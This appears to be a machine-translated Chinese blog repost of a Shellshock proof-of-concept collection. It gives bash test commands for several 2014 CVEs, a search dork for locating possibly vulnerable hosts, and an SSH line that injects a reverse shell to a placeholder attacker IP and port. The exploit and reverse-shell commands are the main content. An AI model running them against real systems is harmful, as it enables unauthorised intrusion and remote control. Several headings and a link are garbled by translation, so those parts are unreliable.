标注的博客| 安全研究| 渗透测试| APT

首页

github。

作者 prehn 时间 2020-04-15
all

ShellShocker概念和潜在目标的证明集

维基百科链接:https://en.Wikipedia.org/wiki/Shellshock-28software-bug%29-CVE-2014-7186-u和CVE-2014-7187-u详细信息

如果您有更多链接或其他资源,请提交请求

推测:(未证实可能脆弱)

inurl:inurl:/dana-na/auth/url_default/welcome.cgi

如果您知道其中任何一个的PoCs,请提交一个带有链接的问题或请求。

命令行(通过Cygwin的Linux、OSX和Windows)

CVE-2014-6271

env X='() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c id

CVE-2014-7169

将在cwd中创建一个名为echo的文件,其中包含日期(如果易受攻击)

env X='() { (a)=>\' bash -c "echo date"; cat echo

CVE-2014-7186

bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo "CVE-2014-7186 vulnerable, redir_stack"

CVE-2014-7187

(for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"

CVE-2014-6278

env X='() { _; } >_[$($())] { echo CVE-2014-6278 vulnerable; id; }' bash -c :

CVE-2014-6277

如果易受攻击,将segfault

env X='() { x() { _; }; x() { _; } <<a; }' bash -c :

IBM z/OS-

超文本传输协议

Phusion乘客

DHCP协议

宋承宪

LC_X='() { :; }; echo vulnerable' ssh [email protected] -o SendEnv=LC_X ssh [email protected] '() { ignore;}; /bin/bash -i >& /dev/tcp/REVERSESHELLIP/PORT 0>&1'

OSX公司

OSX-带反向DNS(CVE-2014-3671.txt)

Q邮件

后缀。

文件传输协议

开放虚拟专用网

神谕。

TMNT公司

[email protected]:~$ env X='() { (a)=>\' /bin/bash -c "shellshocker echo -e \" __ __\n / V \ \n _ | | |\n / \ | | |\n | | | | |\n | | | | |\n | |__| | |\n | | \ |___|___\n | \ |/ \ \n | | |______ |\n | | | |\n | \__' / |\n \ \( /\n \ /\n \| |\n\""; cat shellshocker /bin/bash: X: line 1: syntax error near unexpected token `=' /bin/bash: X: line 1: `' /bin/bash: error importing function definition for `X' __ __ / V \ _ | | | / \ | | | | | | | | | | | | | | |__| | | | | \ |___|___ | \ |/ \ | | |______ | | | | | | \__' / | \ \( / \ / \| |

杯子

IRC公司

来自@primalsec的脚本

shell_shocker.py w3af_shocker.py shell_sprayer.py